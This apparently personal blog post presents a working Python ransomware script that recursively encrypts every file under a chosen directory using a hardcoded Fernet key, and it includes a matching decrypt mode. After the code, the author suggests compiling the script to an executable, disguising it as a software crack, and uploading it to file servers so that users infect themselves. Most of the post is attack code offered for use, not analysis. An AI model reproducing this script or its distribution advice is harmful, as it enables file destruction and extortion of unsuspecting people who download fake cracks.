Ransomware with Python

Share the blog with your friends
  •  
  •  
  •  
  •  
  •  
  •  
  •  

Hello Everyone,

Ransomware was the famous attack and still that exists. I have attempted a simple Python script which mimics the functionality of ransomware behavior. Let’s see what Wiki says about Ransomware.

Ransomware is a type of malware that restricts access to the infected computer system in some way, and demands that the user pay a ransom to the malware operators to remove the restriction. Some forms of Ransomware systematically encrypt files on the system’s hard drive, which become difficult or impossible to decrypt without paying the ransom for the encryption key, while some may simply lock the system and display messages intended to coax the user into paying. Ransomware typically propagates as a trojan, whose payload is disguised as a seemingly legitimate file; thus, Ransomware is an access-denial type of attack that prevents legitimate users from accessing files.[1]

I have tried to implement Ransomware concept in Python and came with the following script. I have used Cryptography module which uses symmetric key [Single key for encryption/decryption] to encrypt the binary content of files. Very soon I will post the script using AES 128 bit encryption. Instead of reading lot of text, let’s have a look at the script.

Process:

Modules Needed: cryptography

Script Input 1: Directory Location to encrypt

Script Input 2: Action (Encryption/Decryption)

# Warning: This script involves encryption of files. Please use at your own risk.
# Script will prompt to input the location and action(Encrypt/Decrypt) to test and experience how ransomware will behave.
# I have used cryptography module to encrypt the content of file and have given the key too.
#########################################################################################################################
import os,subprocess
from cryptography.fernet import Fernet
 
fpath_list = []
#Encryption symmertric key
key = b'dS-CU3TI1pHCaS_cSukrviippvmkmrz7pOcU3v9cq9c='
#You can generate your key using the below line
#key = Fernet.generate_key()
f = Fernet(key)
 
#Add the file location to the global list
def evaluate_file(file_loc):
    global fpath_list
    ext_list = []
    fpath_list.append(str(file_loc))
    ext_list.append(str(file_loc).split(".")[1])
 
#Loop through the given location recursively
def nav_folder(dir_path):
    if os.path.isdir(dir_path):
        files = os.listdir(dir_path)
        for f in files:
            if not f.startswith('.'):
                if os.path.isdir(os.path.join(dir_path,f)):
                    nav_folder(os.path.join(dir_path,f))
                else:
                    evaluate_file(os.path.join(dir_path,f))
    else:
        evaluate_file(dir_path)
 
#Encrypt each file in the filepath global list
def encrypt(s_loc):
    global f
    for file in fpath_list:
        fname = str(file).replace("\\", "\\")
        try:
            sfile = open(fname, 'rb')
            final_string = f.encrypt(sfile.read())
            sfile.close()
            sfile = open(fname, 'wb')
            sfile.write(bytes(final_string))
            sfile.close()
        except Exception as e:
            exp_file = open('error.log','w')
            exp_file.writelines(e.message)
            exp_file.close()
 
#Decrypt each file in the filepath global list
def decrypt(d_loc):
    global f
    for file in fpath_list:
        fname = str(file).replace("\\", "\\")
        try:
            sfile = open(fname, 'rb')
            final_string = f.decrypt(sfile.read())
            sfile.close()
            sfile = open(fname, 'wb')
            sfile.write(bytes(final_string))
            sfile.close()
        except Exception as e:
            exp_file = open('error.log', 'w')
            exp_file.writelines(e.message)
            exp_file.close()
 
 
def main():
    s_loc = input("Enter the source location:")
    action = input("Enter action encrypt/decrypt (E/D)")
    nav_folder(s_loc)
    if action == "E":
        encrypt(s_loc)
    elif action == "D":
        decrypt(s_loc)
    else:
        "Please enter proper action E or D"
if __name__ == '__main__':
     main()

Possibilities with this script:

  1. Existing partitions can be fetched and the entire directory which has the permission can be encrypted.
  2. Python script can be converted to exe. Change the name and icon of the exe and upload to fileservers in the name of cracks (Ex. Adobe Photoshop Crack). That’s it. Users are very eager to download crack which can give them full access to licensed products. So just use them. When I type this point I remember one line which I read from Tweet. (If you are not paying with money, You are paying with your data)
  3. Use this script to encrypt your personal data and keep the key safe 🙂
  •  
  •  
  •  
  •  
  •  
  •  
  •  

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *